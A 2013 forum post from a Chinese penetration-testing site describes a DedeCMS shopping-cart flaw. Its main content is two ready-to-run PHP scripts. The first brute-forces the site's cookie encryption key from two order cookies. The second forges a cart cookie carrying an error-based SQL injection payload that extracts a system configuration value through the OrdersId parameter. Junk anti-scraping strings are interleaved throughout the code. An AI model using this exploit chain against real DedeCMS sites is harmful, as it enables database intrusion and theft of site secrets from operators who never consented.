中国网络渗透测试联盟
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
[打印本页]
作者:
admin
时间:
2013-2-13 23:58
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
www.xxx.com/plus/search.php?keyword=
4 r1 }7 X3 V7 `. h% p9 K6 j! w+ ~ @
在 include/shopcar.class.php中
' k) O( `" \3 Q! t1 {- `4 C4 _
先看一下这个shopcar类是如何生成cookie的
! B' u) K( { `) P2 l
239 function saveCookie($key,$value)
/ Y" G1 K W+ [% x$ k1 S9 Z, }. Y
240 {
; y1 j% h# R! e' o/ e# V! Z9 Z
241 if(is_array($value))
' X. w7 S, Y" H" {# p( V
242 {
% a* @* t& A) M |6 h3 s. L
243 $value = $this->enCrypt($this->enCode($value));
: U+ `. b/ Z% c ?4 u" r
244 }
0 }. p, f) w6 L2 ~7 ]6 x2 k
245 else
: b& T4 q1 e8 t' x. t$ c$ N
246 {
# x" j6 _3 M L* u& f
247 $value = $this->enCrypt($value);
- ^6 M. s; p4 J* J5 ~$ j: K
248 }
* T) J+ B9 `* T2 z: B
249 setcookie($key,$value,time()+36000,’/');
6 n4 G* g" [$ m" T- I
250 }
8 j& H" d8 w3 v+ d
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
0 |6 n. i. Q* ]' p) ]' H
186 function enCrypt($txt)
x# Y* \. e6 ]
187 {
' l& V, D, w' \$ b* F
188 srand((double)microtime() * 1000000);
- L7 G8 c! H* J: h D
189 $encrypt_key = md5(rand(0, 32000));
3 \8 J" A7 _" ^6 S g ]
190 $ctr = 0;
4 L8 a% t {0 }: p+ D( W& p$ Q: @
191 $tmp = ”;
8 p" ^& |' Q) q1 T: |& Z
192 for($i = 0; $i < strlen($txt); $i++)
3 }2 P ]+ k. {( b6 d
193 {
' m; E: f" S7 j: d/ z- T
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$ s; c) d( U( k) B; k
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
, P0 B5 J. p% Y1 D% N) i
196 }
* K( ~" _! Z7 y, y, |9 B+ l
197 return base64_encode($this->setKey($tmp));
1 \4 [! C. ~) X
198 }
: t) r4 Q7 W: x
213 function setKey($txt)
0 |4 C- E$ O0 K1 Y; Q2 R; Q& T
214 {
5 f0 G% p2 Y8 z( E' T
215 global $cfg_cookie_encode;
' c: V4 U+ Y% U0 t" X
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
( A8 z2 g: R5 h+ G' _6 f
217 $ctr = 0;
. m( A! Z l* P; E/ u3 B0 O* l( s
218 $tmp = ”;
& `$ k* K: N* Q
219 for($i = 0; $i < strlen($txt); $i++)
0 T9 G8 Y$ ]) J9 i
220 {
( k: K7 m( ^( b9 Q" e& r! e9 @$ f- g
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
9 i B. P9 w3 K
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
) Y9 c0 F9 R# I1 J8 O2 N- E% K1 {
223 }
8 L$ r/ \3 n |& o9 \
224 return $tmp;
2 V1 U* I( W2 L5 z; M4 f1 e
225 }
3 v% ?4 U Z1 c9 c8 f+ I. K- K
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
* K9 t+ o8 {. u
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
3 C g* o0 c, ^
具体代码如下:
0 D2 z+ q, l& M, \2 u
<?php
$ _& g4 U8 ]" r) ~" ]- s' i
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
* \" }. \3 a: e. f( r
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
/ x, M9 H7 O: t5 J: Z- q* c
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
. z e( U* o- y9 I! f; \
function reStrCode($code,$string)
1 {+ ^* N2 q( e; G" b
{
* N* s$ Y% j5 M- f
$code = base64_decode($code);
! b+ U0 O8 U5 u
$key = “”;
. `$ x7 R& M R; d5 h$ d3 }
for($i=0 ; $i<32 ; $i++)
% y. J- h9 `( C$ `
{
& h& f' b& E3 S
$key .= $string[$i] ^ $code[$i];
- a' D& c! _! l
}
4 i/ F/ o/ W, Z: `$ Z
return $key;
, H: s) A! J5 \
}
( {+ q" o. @' t
function getKeys($cookie,$plantxt)
* Y1 Q0 k& T; `
{
+ Z; J, Z; D+ ?" L9 |: r7 F
$tmp = $cookie;
+ I: j1 G; G9 w& C
$results = array();
2 H% A$ P& ]5 A: H* m5 V' S
for($j=0 ; $j < 32000; $j++)
; m, h6 P* E! i9 X9 ^0 |
{
# {& F, B5 W) K* Z9 Q/ `
$ [6 V+ U3 ]9 L
$txt = $plantxt;
* s8 j7 g. |( J
$ctr = 0;
9 N8 E. ~8 x, d# c+ b
$tmp = ”;
- M: l/ B- `9 G6 `
$encrypt_key = md5($j);
4 C0 g7 B, H y I9 H( ?+ k7 G
for($i =0; $i < strlen($txt); $i ++)
. S5 Y' S7 }8 l4 e7 j
{
2 o3 {8 C$ N+ Q# {4 S# h n& G P3 }
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
& v, j* c0 h, d
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
' o! y4 L9 W4 {% u: \4 g1 M' g
}
; x% C; g9 u6 V; \. J9 b
$string = $tmp;
1 P& M, d" j( W' r# Z! l. I
$code = $cookie;
7 e" T+ P1 J2 {7 H
$result = reStrCode($code,$string);
$ K- _" U3 R; r, t" Q$ Q; K
if(eregi(‘^[a-z0-9]+$’,$result))
) ^- w) w- F- I- R9 T2 {
{
3 B; z& O0 k2 E8 V; A7 c2 w w
echo $result.”\n”;
; o6 Y7 v4 x9 f: F5 M T# b# o' Y
$results[] = $result;
- \$ d) U; y# X2 h' E. S' M
}
4 e# i5 u0 [3 d* P7 `+ x( B/ M
}
; J( c3 S! y1 h- X- V" F2 R* K
return $results;
3 i2 f. x) P" z$ k1 D3 g; j
}
0 i( Z4 _ a5 o k
$results1 = getKeys($cookie1,$plantxt);
+ b6 m. x: E# R/ Q8 X/ H$ Q
$results2 = getKeys($cookie2,$plantxt);
$ U6 v; @' J7 T. A, i' ^
print “\n——————–real key————————–\n”;
' N% S5 L; T" L$ r. t
foreach($results1 as $test1)
, n0 x) R" Z+ Z, Q
{
4 Z; {0 C8 o- f5 Q
foreach($results2 as $test2)
C; L$ p8 _9 t8 |( i2 I
{
+ b$ J0 u( g! ~- m: R6 V
if($test1 == $test2)
& m2 k* F7 ~- G3 }% n" @. k7 t/ L
{
8 m6 c3 Y# b2 N" |; u9 q, b ]1 V3 I" N
echo $test1.”\n”;
! T: r; `' G/ A1 f. H8 r* l s& [
}
9 }7 x+ p# K9 \6 e' ^6 g
}
; Q/ Y* @: V) R7 i: `9 v
}
$ d" H/ C- V" H$ {+ ]7 G% ]) o3 i
?>
) B4 n' U" P+ m7 ]7 y3 C% R
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
( R+ ~6 j/ m; k+ t0 l, U2 G
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
( I' j0 |) p4 k, Y5 E9 F
然后推算出md5(strtolower($cfg_cookie_encode))
8 A' O. D, h. O8 Z' I; ~6 Z; l
得到这个key之后,我们就可以构造任意购物车的cookie
' B0 t3 y+ z0 I" r7 O/ g G; U
接着看
3 u6 u0 K5 y5 k. U# `$ v
20 class MemberShops
$ \3 p' }4 w( c% Q/ p5 p% o
21 {
. B" s `* V/ S
22 var $OrdersId;
( F7 ^- ?' H$ _
23 var $productsId;
/ Y' ]6 g. v% r, ?2 @% E1 M
24
9 r# m( [# m2 g. O, _1 O* H+ Y" q, U
25 function __construct()
% M0 d8 f$ b1 n3 |- n+ h& X0 g! {
26 {
Z4 u$ R6 E4 K
27 $this->OrdersId = $this->getCookie(“OrdersId”);
- V4 q: w) d2 n) i
28 if(empty($this->OrdersId))
' j1 w o4 w3 ?) o B9 a' y* U8 J( q
29 {
- s, c4 i% Y( v- J* l& B0 J% k
30 $this->OrdersId = $this->MakeOrders();
- J: a: c; s/ B$ i' Y* r" d1 y$ s
31 }
" S: R1 Z u D5 V7 z
32 }
2 r7 s+ g( D- J
发现OrderId是从cookie里面获取的
: S" i( f. J- e6 v) w Q
然后
& y4 a7 x$ _2 u! t
/plus/carbuyaction.php中的
9 e9 P9 z6 D9 Y% J
29 $cart = new MemberShops();
% H4 o3 M2 K5 v8 }( t- j" s
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
6 S" d- q0 K+ u1 N
……
$ b9 w& {7 S1 ]& I
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
# D3 }3 y* @" [' o
接着我们就可以注入了
" l/ }8 L( L+ J; M7 b
通过利用下面代码生成cookie:
+ i. z6 `% }( S
<?php
9 P2 z& N, c) [ A& S8 T
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
9 I/ r. U; }2 a
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
& ?7 u2 `" N6 @) y0 }
function setKey($txt)
! h% F' C- I5 |! M# a' S
{
, f1 Z6 A# e% E) B
global $encrypt_key;
9 q. L' a8 k/ x# K
$ctr = 0;
& x. W/ L4 `, ]: G* ]. p) S h1 v
$tmp = ”;
: j7 a( z% q ~. d: r8 q3 b
for($i = 0; $i < strlen($txt); $i++)
4 J/ l D& l" i. Z! Q) ^# a+ o
{
1 @ t }; J& ?5 l
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
1 k+ b" Z( h' P
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
# H6 `9 }9 I1 _- I& n: h( _
}
8 W$ X* u; I6 \, \3 l* u
return $tmp;
, s5 l( e* Q, Q
}
7 E% X& B& \4 h4 r4 o
function enCrypt($txt)
9 _+ ?( u+ P4 t4 O
{
$ a2 j& f, S+ C# n7 L2 R# \
srand((double)microtime() * 1000000);
D1 n+ l: f5 `, @) F. |
$encrypt_key = md5(rand(0, 32000));
4 P4 ]) _- @* D
$ctr = 0;
0 I2 ^+ a* ] C4 ~+ t
$tmp = ”;
6 q/ c' @( u8 y$ m% b
for($i = 0; $i < strlen($txt); $i++)
% s8 {8 G& _: D3 G
{
( u. x% P# Q; T# W4 v0 C
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
* a# L4 q' }- b; G( f$ @0 `
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
+ s# e: H+ v, i/ O a/ w
}
2 n1 G- }4 b* ?1 w' k& m, Q) d
return base64_encode(setKey($tmp));
9 m D0 c1 b- n% p" G y
}
! l1 e9 M/ d5 d/ [5 n ~' T
for($dest =0;$dest = enCrypt($txt);)
; `8 t( R- D3 w, h" ]/ H2 ^3 x# i
{
5 C j8 `* c) x* s8 k2 I7 |! v# g
if(!strpos($dest,’+'))
" O* F" L+ f( k& w* }* z( A
{
2 p( x/ B- A2 n# h: j$ |& {
break;
8 n& z7 E; M$ K6 w
}
: E4 b/ e6 z6 K9 @& o& H
}
; \) E# h: s7 w# P4 `$ n3 @& y" y
echo $dest.”\n”;
4 |- B( C8 ^3 t4 l, c9 q" f
?>
3 W h5 s% E9 m. `" R- O
! M5 [2 Y9 g! t
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2